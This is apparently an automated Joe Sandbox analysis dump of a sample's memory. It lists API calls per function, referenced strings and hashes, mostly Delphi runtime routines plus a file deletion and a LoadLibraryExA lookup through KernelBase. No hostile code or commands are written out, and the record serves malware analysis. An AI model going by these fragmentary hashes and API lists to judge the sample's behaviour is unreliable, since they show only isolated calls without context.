                      • Instruction ID: f9043de021f4a34bb4421796fa30e84f945c5ccf2b011e17e640d533ad1f1aa4
                      • Opcode Fuzzy Hash: 04bcbcdbf97a37c569b4dc7d71b775fc47ae6acb87d6c073bc15c153bbad84ce
                      • Instruction Fuzzy Hash: BC01867EA453486EFB05E7E4CDA1BCDB7BDAB54B04F5000E29200E6492DF746B19CB22
                      APIs
                        • Part of subcall function 02894ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02894EDA
                      • RtlInitUnicodeString.NTDLL(?,?), ref: 028ADEA0
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADEF2), ref: 028ADEB6
                      • NtDeleteFile.NTDLL(?), ref: 028ADED5
                        • Part of subcall function 02894C0C: SysFreeString.OLEAUT32(028AED84), ref: 02894C1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                      • String ID:
                      • API String ID: 1694942484-0
                      • Opcode ID: 65dfcebf0f218996466e1b20f823dc84b7fdbc7278a39f8c141c1e949c7e8b17
                      • Instruction ID: b5535dc2f0a5ea412858f62bc5088d34081c26bb7d6ef8f93d9438efe2473ac3
                      • Opcode Fuzzy Hash: 65dfcebf0f218996466e1b20f823dc84b7fdbc7278a39f8c141c1e949c7e8b17
                      • Instruction Fuzzy Hash: E901F47D940248BAEB11EBE4CD61FDEB3BDEB58700F5044B1A601E2580EF756B148A65
                      APIs
                      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02897F75
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: DiskFreeSpace
                      • String ID:
                      • API String ID: 1705453755-0
                      • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                      • Instruction ID: a2bfd6feb6bb550ac774bae51f8af12296f29db3ba7000db5eb99d9cc9dd0456
                      • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                      • Instruction Fuzzy Hash: 581100B5A00209AF9B04CF9DC8809AFF7F9EFC8304B14C569A508EB254E6319A018B90
                      APIs
                      • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0289A762
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                      • Instruction ID: d814ab3b97626573e48520275640cd9615ddd9f0fabb139ec4b24c2caa278e08
                      • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                      • Instruction Fuzzy Hash: 16E0D83D70021827DB15A5AC9C819F6735D975C310F04417EBD49C7341FDA19D404EE5
                      APIs
                      • GetVersionExA.KERNEL32(?,028BD106,00000000,028BD11E), ref: 0289B71A
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 3d6040078e2d3b2e26761f854c4311bb14854f4f32b5198d6e945d1973107ae5
                      • Instruction ID: 0fd25192b939acda6ef8ccf7cc6fee2a8089c1af5b63d08140b1e1e6bd274b04
                      • Opcode Fuzzy Hash: 3d6040078e2d3b2e26761f854c4311bb14854f4f32b5198d6e945d1973107ae5
                      • Instruction Fuzzy Hash: A6F0177C904305AFD751DF28E540A5577E9FB48B04F848D2CE699C7780E7399418CF5A
                      APIs
                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0289BDF2,00000000,0289C00B,?,?,00000000,00000000), ref: 0289A7A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                      • Instruction ID: 37f70dd436098941240fcf38343711eea672bb4dc605a16aeb3876cc9542d687
                      • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                      • Instruction Fuzzy Hash: EDD05EBE30E2603AA624915A2D85D7B5AFCCAC57A1F08403EF588C6201D2008C0596F1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: LocalTime
                      • String ID:
                      • API String ID: 481472006-0
                      • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                      • Instruction ID: 2989e7c8566a69bd7abd289a05a11fa1c55da388cb09da66b9dbc5021717cc83
                      • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                      • Instruction Fuzzy Hash: 23A01128808830028A803B2C0C0223A3088A800A20FC80F80A8F8802E2FE2E022080E3
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 007f7118ed148b327ae0518c11a45bc40620c11e986c5062092c6bdf67fe7d0f
                      • Instruction ID: f7d47b1fce763081f3145c2debae8fa2a3df3d393fe6ba46a6a680f27ebde7e7
                      • Opcode Fuzzy Hash: 007f7118ed148b327ae0518c11a45bc40620c11e986c5062092c6bdf67fe7d0f
                      • Instruction Fuzzy Hash: F751E6790592C28FC7438F7884A86D17FF1AE1B62434906DAC8D4CF263E3696897DB11
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                      • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                      • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                      • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                      APIs
                      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0289D21D
                        • Part of subcall function 0289D1E8: GetProcAddress.KERNEL32(00000000), ref: 0289D201
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                      • API String ID: 1646373207-1918263038
                      • Opcode ID: 0a09cebae0315e9dc28a66b11e6f7c0fba7028c7cb5d231eea5de29ea2c8bcf6
                      • Instruction ID: 3300339cd46ec7f3ee8912e062ca989361d07d33ccfa5f875ae34347d7cb28c1
                      • Opcode Fuzzy Hash: 0a09cebae0315e9dc28a66b11e6f7c0fba7028c7cb5d231eea5de29ea2c8bcf6
                      • Instruction Fuzzy Hash: 14410C7EA842085B5E087B6D7500827FFDED6C97103A8841BBA04CB788DDB1BD594E7E
                      APIs
                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 028A6E5E
                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 028A6E6F
                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 028A6E7F
                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 028A6E8F
                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 028A6E9F
                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 028A6EAF
                      • GetProcAddress.KERNEL32 ref: 028A6EBF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                      • API String ID: 667068680-2233174745
                      • Opcode ID: 04b364091ec235a1d63c59dec21024e1154272aea569d98f360c231bd15d2481
                      • Instruction ID: 6dcc19a2224de4aca5fbc1bd4712bc70ec5269c12f4e9da87a1903efda48911c
                      • Opcode Fuzzy Hash: 04b364091ec235a1d63c59dec21024e1154272aea569d98f360c231bd15d2481
                      • Instruction Fuzzy Hash: DDF09EBC9847316EBF027F749C918772B5DA91168435C2819A502E5A87FF7984304B51
                      APIs
                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028928CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Message
                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                      • API String ID: 2030045667-32948583
                      • Opcode ID: a5f1d13035eb8e03cd8058cbe49f7a85657567bb817f806faeb3db61bbd5dcf3
                      • Instruction ID: 1fde73932357c719c959b4eb28cf2ea815647205f34aad37486cb4099dafae0e
                      • Opcode Fuzzy Hash: a5f1d13035eb8e03cd8058cbe49f7a85657567bb817f806faeb3db61bbd5dcf3
                      • Instruction Fuzzy Hash: 84A1073CA04254AFDF21AA2CCC84BD876E5EB09314F1801E5DD4DEB38ACB759989CF51
                      Strings
                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02892849
                      • Unexpected Memory Leak, xrefs: 028928C0
                      • bytes: , xrefs: 0289275D
                      • 7, xrefs: 028926A1
                      • The unexpected small block leaks are:, xrefs: 02892707
                      • An unexpected memory leak has occurred. , xrefs: 02892690
                      • , xrefs: 02892814
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID:
                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                      • API String ID: 0-2723507874
                      • Opcode ID: 6e85c248001a515c84f5076380aed61a0a1132958a1d2af5ea1e4407e450c388
                      • Instruction ID: fa772b88f966f967225c29b11d265f4c408c8eb594972a172fe374f1b4b1dcf7
                      • Opcode Fuzzy Hash: 6e85c248001a515c84f5076380aed61a0a1132958a1d2af5ea1e4407e450c388
                      • Instruction Fuzzy Hash: C171D43CA04258AFDF219B2CCC84BD9B6E5EB09314F1801E5D94DE7289CB7549C5CF52
                      APIs
                      • GetThreadLocale.KERNEL32(00000000,0289C00B,?,?,00000000,00000000), ref: 0289BD76
                        • Part of subcall function 0289A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0289A762
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Locale$InfoThread
                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                      • API String ID: 4232894706-2493093252
                      • Opcode ID: 0a81b4b8e6154283f423653484a013178925285ab997f8593a3e7def3c39c6c1
                      • Instruction ID: 6e5ed7fe4b9cff6fd881a690fc4fffde495082b9ac76620e6ef6a488e4bc8617
                      • Opcode Fuzzy Hash: 0a81b4b8e6154283f423653484a013178925285ab997f8593a3e7def3c39c6c1
                      • Instruction Fuzzy Hash: 0C61733C7101489BDF04EBE8D850B9F77F79B88300F189435E205EB745CA3AD90A9B62
                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 028AAE38
                      • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 028AAE4F
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 028AAEE3
                      • IsBadReadPtr.KERNEL32(?,00000002), ref: 028AAEEF
                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 028AAF03
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Read$HandleModule
                      • String ID: KernelBase$LoadLibraryExA
                      • API String ID: 2226866862-113032527
                      • Opcode ID: e9778b8f7f5410bb8f3c0b06abe01951ac09fb9cdde240e6604f380265c72492
                      • Instruction ID: 654bdb466c2b9d231f531f97783e0f87163b656976c1c4f199d4d32ac536e0ea
                      • Opcode Fuzzy Hash: e9778b8f7f5410bb8f3c0b06abe01951ac09fb9cdde240e6604f380265c72492
                      • Instruction Fuzzy Hash: 7D3170BDA40305BBEB64DF68CC95F6A77B8AF04368F044510EA58DB681DB70A950CBA1
                      APIs
                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028943F3,?,?,028F17C8,?,?,028BE7A8,0289655D,028BD30D), ref: 02894365
                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028943F3,?,?,028F17C8,?,?,028BE7A8,0289655D,028BD30D), ref: 0289436B
                      • GetStdHandle.KERNEL32(000000F5,028943B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028943F3,?,?,028F17C8), ref: 02894380
                      • WriteFile.KERNEL32(00000000,000000F5,028943B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028943F3,?,?), ref: 02894386
                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028943A4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FileHandleWrite$Message
                      • String ID: Error$Runtime error at 00000000
                      • API String ID: 1570097196-2970929446
                      • Opcode ID: fe271414dcffe75aba7719b60decb5f91bfe9b2196639081408e25e351a4e277
                      • Instruction ID: 2ce8129848c4ac31de6221d2e98611a9df36ee2d0123c906b8118d9a5a6b3eb5
                      • Opcode Fuzzy Hash: fe271414dcffe75aba7719b60decb5f91bfe9b2196639081408e25e351a4e277
                      • Instruction Fuzzy Hash: BDF0F07CAC8304BCFE11A274AC0AFD9335C4B44B10F5C0A09B328E89D087A860C5AB2A
                      APIs
                        • Part of subcall function 0289ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0289ACD9
                        • Part of subcall function 0289ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0289ACFD
                        • Part of subcall function 0289ACBC: GetModuleFileNameA.KERNEL32(02890000,?,00000105), ref: 0289AD18
                        • Part of subcall function 0289ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0289ADAE
                      • CharToOemA.USER32(?,?), ref: 0289AE7B
                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0289AE98
                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0289AE9E
                      • GetStdHandle.KERNEL32(000000F4,0289AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0289AEB3
                      • WriteFile.KERNEL32(00000000,000000F4,0289AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0289AEB9
                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0289AEDB
                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0289AEF1
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                      • String ID:
                      • API String ID: 185507032-0
                      APIs
                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0289E5A5
                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0289E5C1
                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0289E5FA
                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0289E677
                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0289E690
                      • VariantCopy.OLEAUT32(?,00000000), ref: 0289E6C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                      • String ID:
                      • API String ID: 351091851-0
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0289358A
                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028935D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028935BD
                      • RegCloseKey.ADVAPI32(?,028935E0,00000000,?,00000004,00000000,028935D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028935D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                      • API String ID: 3677997916-4173385793
                      APIs
